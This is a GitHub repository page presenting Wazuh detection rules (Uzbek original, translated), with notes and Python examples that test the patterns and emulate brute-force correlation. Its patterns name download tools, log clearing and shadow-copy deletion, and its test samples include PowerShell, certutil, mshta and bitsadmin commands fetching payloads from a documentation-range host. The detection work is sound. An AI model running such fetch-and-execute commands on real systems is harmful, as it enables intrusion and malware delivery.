tuneplus/malwere-rule-wazuh_uzbek
GitHub: tuneplus/malwere-rule-wazuh_uzbek
An open-source set of security detection rules for the Wazuh platform, providing threat monitoring and alerting across Windows, Linux and network traffic.
Stars: 0 | Forks: 0
# malwere-rule-wazuh_uzbek
# Wazuh rules (Uzbek-language rule set)
The rules below are reproduced as extracted from the repository's XML: for each rule only the text content survived (the parent reference from if_sid / if_matched_sid / if_group, the match pattern, the alert description, the groups and any MITRE id). The id, level, frequency and timeframe attributes are not on this page. Alert descriptions are translated to English; patterns, rule numbers and field names are kept verbatim.

## Windows logon and account management

Parent: 60122
Pattern: ^4625$
Description: Logon failure: user $(win.eventdata.targetUserName)
Groups: authentication_failed, audit_failure

Parent: 60106
Pattern: ^4624$
Description: Logon success: user $(win.eventdata.targetUserName)
Groups: authentication_success

Parent: 100012
Description: Warning: brute-force attack detected! (user: $(win.eventdata.targetUserName))
Groups: authentication_failed, brute_force

Parent: 60109
Pattern: ^4720$
Description: SOC: new user created! Name: $(win.eventdata.targetUserName). Performed by: $(win.eventdata.subjectUserName)

Parent: 60111
Pattern: ^4726$
Description: SOC: user deleted: $(win.eventdata.targetUserName). Performed by: $(win.eventdata.subjectUserName)

Parent: 60110
Pattern: ^4723$|^4724$|^4738$
Description: SOC: user password changed (4723 = change attempt, 4724 = reset attempt) or account modified (4738): $(win.eventdata.targetUserName)

Parent: 60144
Pattern: IT-FULLCONTROL
Description: SOC: critical! User added to the IT-FULLCONTROL group: $(win.eventdata.memberName)
Groups: privilege_escalation, mitre_t1098
## Windows process execution (command-line matching)

Parent: 60103
Pattern: (?i)powershell
Description: Warning: a PowerShell process was started on the system!
Groups: suspicious_process, powershell

Parent: 60103
Pattern: (?i)(whoami|net\s+user|ipconfig\s+/all|net\s+localgroup)
Description: Suspicious activity: system information is being gathered from CMD: $(win.eventdata.commandLine)
Groups: discovery, mitre_t1082, mitre_t1087

Parent: 60103
Pattern: (?i)(certutil.*-urlcache|certutil.*-f|curl|wget|bitsadmin)
Description: Warning: attempt to download an unknown file onto the system! Command: $(win.eventdata.commandLine)
Groups: lateral_movement, mitre_t1105

Pattern: (?i)mshta\.exe
Description: Alert: suspicious MSHTA process detected!
Groups: defense_evasion, mitre_t1218.005

Pattern: (?i)cmd\.exe
Description: Warning: CMD (command prompt) was started

Note: these patterns are written in PCRE2 syntax (the (?i) inline flag, \s+), so the rule element that carries them must be declared with type="pcre2"; Wazuh's default OS_Regex engine has no inline flags. They are also unanchored substring matches: curl and wget fire on any command line that merely contains those letters, and the bare powershell and cmd\.exe rules fire on every interactive shell and logon script, so treat those two as inventory rules (low level) rather than alerts. T1105 (Ingress Tool Transfer) belongs to the Command and Control tactic rather than lateral movement.
## File integrity monitoring (syscheck)

Parent: 554
Pattern: ^X:\\FTP-MARKAZI|^C:\\Windows\\System32|^C:\\yara|^C:\\Users\\.*\\Downloads
Description: Created: new file in a monitored folder: $(file)
Groups: syscheck, fim_event, fim_added

Parent: 553
Pattern: ^X:\\FTP-MARKAZI|^C:\\Windows\\System32|^C:\\yara|^C:\\Users\\.*\\Downloads
Description: Deleted: warning! A monitored file was deleted: $(file)
Groups: syscheck, fim_event, fim_deleted

Parent: 550
Pattern: ^X:\\FTP-MARKAZI|^C:\\Windows\\System32|^C:\\yara|^C:\\Users\\.*\\Downloads
Description: Changed: file content was modified: $(file)
Groups: syscheck, fim_event, fim_modified

Parent: fim_event
Description: Warning: bulk file changes/deletions detected within a short time! (suspected ransomware)
Groups: syscheck, ransomware_detection, mitre_t1486

Note: the bulk-change rule is a frequency rule over the fim_event group; its frequency and timeframe values are not shown on this page. C:\Windows\System32 changes constantly during Windows Update and driver installation, so expect that path to dominate the added/modified alerts (and to trip the bulk-change rule) unless it is narrowed to specific files.
## Windows defense evasion, log clearing and LOLBin activity

Parent: windows
Pattern: (?i)DisableRealtimeMonitoring|DisableAntiSpyware
Description: Critical: attempt to disable Windows Defender protection detected!

Parent: windows
Pattern: EnableLUA.*0|ConsentPromptBehaviorAdmin.*0
Description: Critical: UAC (User Account Control) is being disabled!

Parent: windows
Pattern: auditpol.*success:disable|auditpol.*failure:disable
Description: Critical: system auditing (logging) is being turned off!

Parent: windows
Pattern: (?i)vssadmin.*delete.*shadows|Wmic.*Shadowcopy.*Delete
Description: Warning: system backup copies (shadow copies) are being deleted! Suspected ransomware attack!

Parent: windows
Pattern: (?i)wevtutil.*(\scl\s|clear-log)
Description: Critical: system logs are being cleared with wevtutil!

Parent: windows
Pattern: (?i)Clear-EventLog|Remove-EventLog|Clear-History
Description: Critical: system logs or command history are being cleared via PowerShell!
Groups: defense_evasion, powershell

Parent: windows
Pattern: ^1102$|^104$
Description: SOC alert: Windows logs were cleared (1102 = Security log cleared, 104 = System log cleared)! Traces have been wiped!

Parent: windows
Pattern: (?i)rar\.exe|7z\.exe|zip\.exe|tar\.exe
Description: Warning: an archiving tool was started on the system (possible staging for data exfiltration)!
Groups: exfiltration, mitre_t1020

Parent: windows
Pattern: (?i)powershell.*(-enc|-EncodedCommand|-e\s+)
Description: Critical: a hidden (Base64-encoded) command was executed through PowerShell! (malware indicator)
Groups: malware_behavior, mitre_t1059.001

Parent: windows
Pattern: (?i)certutil.*-urlcache.*split.*-f
Description: Alert: suspicious file download via certutil (LOLBin technique)!
Groups: malware_behavior, discovery, mitre_t1105

Parent: windows
Pattern: (?i)bitsadmin.*\/transfer.*http
Description: Alert: suspicious download activity via bitsadmin detected!
Groups: malware_behavior, mitre_t1197

Note: EnableLUA.*0 and ConsentPromptBehaviorAdmin.*0 match any line that contains a 0 anywhere after the value name (a trailing timestamp or PID is enough), so confirm the actual registry value (0 = disabled) before escalating. The encoded-command alert tells the analyst that a payload exists but not what it is; decoding the Base64 (UTF-16LE) argument and attaching the plaintext is what makes that alert actionable.
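To see what the command-line patterns above actually catch, here is an added example (not code from the repository) that runs the same regexes in Python over constructed 4688-style command lines and decodes a PowerShell -EncodedCommand payload so the alert can carry the plaintext. The rule labels, the sample command lines and the 198.51.100.0/24 addresses are assumptions made for this example; Python's re accepts the (?i) and \s constructs the patterns rely on, which is what a pcre2-typed Wazuh field would also need.

```python
import base64
import re

# Command-line patterns copied from the rule set above. They are written in PCRE2
# syntax ((?i) inline flag, \s quantifiers), so in Wazuh the element carrying them
# needs type="pcre2"; Python's re engine understands the same constructs, which lets
# us exercise the patterns offline. Rule labels are assumptions for this example.
PATTERNS = {
    "powershell":      r"(?i)powershell",
    "discovery":       r"(?i)(whoami|net\s+user|ipconfig\s+/all|net\s+localgroup)",
    "download":        r"(?i)(certutil.*-urlcache|certutil.*-f|curl|wget|bitsadmin)",
    "mshta":           r"(?i)mshta\.exe",
    "cmd":             r"(?i)cmd\.exe",
    "encoded_ps":      r"(?i)powershell.*(-enc|-EncodedCommand|-e\s+)",
    "certutil_lolbin": r"(?i)certutil.*-urlcache.*split.*-f",
    "bitsadmin":       r"(?i)bitsadmin.*\/transfer.*http",
}
COMPILED = {name: re.compile(p) for name, p in PATTERNS.items()}

# Matches the -e / -ec / -enc / -encoded / -encodedcommand switch (PowerShell accepts any
# unambiguous prefix) followed by the Base64 blob.
ENCODED_SWITCH = re.compile(r"(?i)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")


def classify(command_line):
    """Names of every rule in PATTERNS whose pattern matches the command line."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]


def decode_encoded_command(command_line):
    """Plaintext of a PowerShell -EncodedCommand payload (Base64 over UTF-16LE),
    or None if the command line carries no decodable payload."""
    m = ENCODED_SWITCH.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed samples (not real telemetry); 198.51.100.0/24 is a documentation range.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")
SAMPLES = [
    "powershell.exe -nop -w hidden -e " + ENCODED,                       # true positive
    "cmd.exe /c whoami /all && net user",                                 # discovery + cmd
    "certutil.exe -urlcache -split -f http://198.51.100.7/x.exe x.exe",   # LOLBin download
    r'"C:\Windows\System32\cmd.exe" /c type C:\reports\wget-stats.txt',   # "wget" false positive
    "mshta.exe http://198.51.100.7/p.hta",
    r"bitsadmin /transfer job /download /priority high http://198.51.100.7/a.exe C:\a.exe",
]


def report():
    """Map each sample to its matching rules, decoding the PowerShell payload when present."""
    out = {}
    for line in SAMPLES:
        out[line] = {"rules": classify(line), "decoded": decode_encoded_command(line)}
    return out


if __name__ == "__main__":
    for line, info in report().items():
        print(f"{str(info['rules']):40} {line[:70]}")
        if info["decoded"]:
            print("    decoded payload:", info["decoded"])
```

The fourth sample shows why the download rule needs anchoring: a file name containing wget is enough to trip it. The decoded payload is what belongs in the alert text; without it the analyst sees only that something was encoded.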
## Linux SSH / PAM authentication

Parent: 5715, 17101
Description: SSH: successful login to the system (user: $(dstuser))
Groups: authentication_success

Parent: 5710, 5503
Description: SSH/PAM: login error detected (user: $(dstuser))
Groups: authentication_failed

Parent: 100192
Description: Warning: SSH brute-force attack detected (IP: $(srcip))
MITRE: T1110
Groups: authentication_failed, brute_force

Parent: 100191
Pattern: root
Description: Danger: the ROOT user logged in over SSH!
Groups: authentication_success, privileged_access

Parent: 5716, 17102
Description: SSH: session closed (user: $(dstuser))
Groups: authentication_success

Parent: 100191
Description: Warning: 3 wrong passwords entered (IP: $(srcip))
Groups: authentication_failed, brute_force

Note: 100191 is referenced as the parent of both the root-login (success) rule and the three-failures (failure count) rule; verify in the repository which rule carries that id, because a success rule and a failure-count rule normally hang off different parents.

## Windows authentication and brute force (second rule block)

Parent: authentication_success
Pattern: 4624
Description: Windows: successful logon
Groups: authentication_success

Parent: authentication_failed
Pattern: 4625
Description: Windows: RDP logon error detected
Groups: authentication_failed

Parent: 100215
Description: Windows: brute-force attack detected! (10 failures)
Groups: authentication_failed, brute_force

Note: event 4625 covers every logon type, not only RDP; to alert on RDP specifically, also match win.eventdata.logonType 10 (RemoteInteractive). The 4624/4625 rules here duplicate the 60106/60122 children at the top of the file, so the same event will satisfy two rule trees and the reported rule depends on ordering.
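The SSH and Windows brute-force rules above (and the bulk-FIM ransomware rule earlier) are frequency rules: they fire when a parent rule matches N times within a window for the same key. As an added example, not code from the repository, the Python below emulates that correlation (Wazuh's frequency and timeframe rule attributes with <same_source_ip/>) over a constructed auth.log excerpt, and shows how a slow spray stays under a 120-second window. Host names, users and the documentation-range IPs are invented for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt (203.0.113.0/24 and 198.51.100.0/24 are documentation
# ranges; host and user names are invented). One fast burst from one IP, then a slow
# spray from another at four-minute intervals.
AUTH_LOG = """\
Mar 10 10:00:01 host1 sshd[2211]: Failed password for invalid user admin from 203.0.113.9 port 51000 ssh2
Mar 10 10:00:03 host1 sshd[2211]: Failed password for invalid user admin from 203.0.113.9 port 51002 ssh2
Mar 10 10:00:05 host1 sshd[2213]: Failed password for root from 203.0.113.9 port 51004 ssh2
Mar 10 10:00:07 host1 sshd[2215]: Failed password for root from 203.0.113.9 port 51006 ssh2
Mar 10 10:00:09 host1 sshd[2217]: Failed password for root from 203.0.113.9 port 51008 ssh2
Mar 10 10:00:20 host1 sshd[2219]: Accepted password for deploy from 198.51.100.4 port 40000 ssh2
Mar 10 10:03:00 host1 sshd[2221]: Failed password for deploy from 198.51.100.4 port 40002 ssh2
Mar 10 10:07:00 host1 sshd[2223]: Failed password for deploy from 198.51.100.4 port 40004 ssh2
Mar 10 10:11:00 host1 sshd[2225]: Failed password for deploy from 198.51.100.4 port 40006 ssh2
Mar 10 10:15:00 host1 sshd[2227]: Failed password for deploy from 198.51.100.4 port 40008 ssh2
Mar 10 10:19:00 host1 sshd[2229]: Failed password for deploy from 198.51.100.4 port 40010 ssh2
"""

# The failure line shape produced by OpenSSH; the same fields Wazuh's sshd decoder exposes
# as dstuser and srcip.
FAILED_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<srcip>\S+)"
)


def parse_ts(stamp, year=2024):
    """syslog timestamps carry no year; assume one so the window arithmetic works."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def brute_force_alerts(log_text, frequency=5, timeframe=120):
    """Emulate a Wazuh frequency rule: alert when `frequency` failed-password events from
    the same source IP fall inside `timeframe` seconds. The per-IP window is cleared after
    an alert so one burst yields one alert; that reset is a choice of this example, not a
    statement about Wazuh internals."""
    windows = defaultdict(deque)   # srcip -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = FAILED_LINE.match(line)
        if not m:                  # accepted logins, session closes, unrelated daemons
            continue
        ts = parse_ts(m["ts"])
        recent = windows[m["srcip"]]
        recent.append(ts)
        while (ts - recent[0]).total_seconds() > timeframe:
            recent.popleft()       # drop failures that aged out of the window
        if len(recent) >= frequency:
            alerts.append({"srcip": m["srcip"], "count": len(recent),
                           "last_user": m["user"], "at": ts.isoformat()})
            recent.clear()
    return alerts


if __name__ == "__main__":
    for a in brute_force_alerts(AUTH_LOG):
        print("brute force:", a)
    print("with a 20-minute window:",
          len(brute_force_alerts(AUTH_LOG, timeframe=1200)), "alerts")
```

With the default 120-second window only the burst from 203.0.113.9 alerts; the spray from 198.51.100.4 never accumulates five failures because each one ages out before the next arrives, and only a 20-minute window catches it. The same loop applies to the bulk-FIM rule by keying on the agent instead of the source IP and counting fim_event matches.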
## Suricata (network IDS)

Parent: suricata
Description: Suricata IDS system event detected.

Parent: 100400
Pattern: DNS|event_type":"dns"
Description: Suricata: DNS event recorded on the network.
Groups: dns

Parent: 100400
Pattern: failed decrypt|QUIC
Description: Warning (Suricata): QUIC traffic decryption failure (failed decrypt) detected!
Groups: suricata_alert

Note: both patterns are substring matches on the raw EVE JSON. DNS also matches alert signature names that contain the word, and QUIC on its own matches every QUIC flow record, not only decryption failures; keep failed decrypt as the trigger and use the QUIC term only as an additional condition if the goal is to alert on failures alone.
## YARA scan results

Parent: yara_log_decoder
Description: YARA: malicious file detected: $(yara.rule)
Groups: malware_yara, scan_report

Parent: yara_generic_decoder
Description: YARA: malicious file detected: $(yara.rule)
Groups: malware_yara, scan_report

Parent: 100501, 100502
Pattern: ransomware|lockbit|wannacry|encrypt|golang_bin
Description: Critical: RANSOMWARE detected: $(yara.rule)
Groups: ransomware

Parent: 100501, 100502
Pattern: Trojan|RAT|njrat|darkcomet|Luckyware|fwhp|krypt|Reflo
Description: Critical: TROJAN/RAT detected: $(yara.rule)
Groups: trojan

Parent: 100501, 100502
Pattern: rootkit|hidden|process|hook|MiniDump|Rootkit|meth_get_eip|AntiVM|MassHunt
Description: Critical: ROOTKIT detected: $(yara.rule)
Groups: rootkit

Parent: 100501, 100502
Pattern: Backdoor|Cobalt|Shell|reverse_shell|pe_detect
Description: Danger: BACKDOOR detected: $(yara.rule)
Groups: backdoor

Parent: 100501, 100502
Pattern: miner|xmr|cryptominer|cpu|Miner|XMR|CoinMiner|monero|BtcMine
Description: Critical: CRYPTOMINER detected: $(yara.rule)
Groups: miner

Parent: 100501, 100502
Pattern: stealer|spyware|keylogger|infostealer|spy|Stealer|Spyware|Keylogger|InfoStealer|Stealc|RedLine|Raccoon|Vidar|AZORult|AgentTesla|SelfExtracting|FormBook|Noon
Description: Danger: INFOSTEALER/SPYWARE detected: $(yara.rule)
Groups: spyware

Parent: 100501, 100502
Pattern: webshell|Webshell|WebShell|c99|r57|b374k|WSO|FilesMan|shell|cmd\.php|eval|base64_decode
Description: Critical: WEBSHELL detected: $(yara.rule)
Groups: webshell

Parent: 100501, 100502
Pattern: (?i)worm|botnet|bot|mirai|ddos|spreader|p2p|autorun|xworm
Description: Critical: WORM/BOTNET detected: $(yara.rule)
Groups: worm_botnet

Note: these category rules key on substrings of the YARA rule name. Only the last pattern is case-insensitive; the others enumerate case variants by hand (rootkit|Rootkit, miner|Miner) and therefore miss spellings such as LockBit or Ransomware. Terms as broad as process, hook, hidden, cpu, shell, eval and bot let one rule name satisfy several categories, or put an unrelated name (a process-injection rule, anything containing "robot") in the wrong one. Wazuh assigns a single rule to each event, so the category in the alert depends on rule ordering; triage on the full yara.rule value rather than on the category label.
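Because the YARA category rules classify on substrings of the rule name, it is worth checking how they behave on realistic names before trusting the category in an alert. The following is an added example (not code from the repository) that applies the eight patterns, exactly as written above, to constructed YARA rule names and reports which names are missed, which land in one category, and which are claimed by several. The sample names and the first-match policy are assumptions of this example.

```python
import re

# Category patterns exactly as they appear in the YARA child rules above, in page order.
# Only the last one carries (?i); the rest are case-sensitive as written, which is also
# how Python's re treats them here.
CATEGORIES = [
    ("ransomware",  r"ransomware|lockbit|wannacry|encrypt|golang_bin"),
    ("trojan",      r"Trojan|RAT|njrat|darkcomet|Luckyware|fwhp|krypt|Reflo"),
    ("rootkit",     r"rootkit|hidden|process|hook|MiniDump|Rootkit|meth_get_eip|AntiVM|MassHunt"),
    ("backdoor",    r"Backdoor|Cobalt|Shell|reverse_shell|pe_detect"),
    ("miner",       r"miner|xmr|cryptominer|cpu|Miner|XMR|CoinMiner|monero|BtcMine"),
    ("spyware",     r"stealer|spyware|keylogger|infostealer|spy|Stealer|Spyware|Keylogger|"
                    r"InfoStealer|Stealc|RedLine|Raccoon|Vidar|AZORult|AgentTesla|"
                    r"SelfExtracting|FormBook|Noon"),
    ("webshell",    r"webshell|Webshell|WebShell|c99|r57|b374k|WSO|FilesMan|shell|cmd\.php|"
                    r"eval|base64_decode"),
    ("worm_botnet", r"(?i)worm|botnet|bot|mirai|ddos|spreader|p2p|autorun|xworm"),
]
COMPILED = [(name, re.compile(pattern)) for name, pattern in CATEGORIES]

# Constructed YARA rule names (invented for this check, not taken from any real ruleset).
SAMPLE_RULE_NAMES = [
    "Win_Ransomware_LockBit_3",       # capitalised: no case-sensitive pattern matches it
    "lockbit_ransomware",             # lowercase spelling of the same family: matches
    "CobaltStrike_Beacon_Shellcode",  # backdoor via "Cobalt" and "Shell"
    "win_process_injection",          # "process" drags an injection rule into rootkit
    "php_webshell_reverse_shell",     # claimed by backdoor and webshell
    "xmrig_cpu_miner",
    "robot_framework_test",           # "bot" inside "robot" -> worm_botnet
    "AgentTesla_Keylogger_RAT",       # claimed by trojan and spyware
]


def categories_for(rule_name):
    """Every category whose pattern matches the YARA rule name, in page order."""
    return [name for name, rx in COMPILED if rx.search(rule_name)]


def first_match(rule_name):
    """The category a first-match-in-page-order policy would report, or None."""
    hits = categories_for(rule_name)
    return hits[0] if hits else None


def overlap_report(names=SAMPLE_RULE_NAMES):
    """Group names by how many categories claim them: missed (0), single (1), ambiguous (2+)."""
    report = {"missed": [], "single": [], "ambiguous": []}
    for n in names:
        hits = categories_for(n)
        key = "missed" if not hits else ("single" if len(hits) == 1 else "ambiguous")
        report[key].append((n, hits))
    return report


if __name__ == "__main__":
    for bucket, entries in overlap_report().items():
        print(bucket)
        for name, hits in entries:
            print(f"  {name:32} -> {hits}")
```

The missed bucket is the most important result: a rule named Win_Ransomware_LockBit_3 produces no category alert at all, because only the worm pattern is case-insensitive. Adding (?i) to every pattern fixes that but widens the overbroad terms (process, shell, bot) further, so the honest fix is to key the categories on explicit YARA rule tags or a naming convention rather than on free-text substrings.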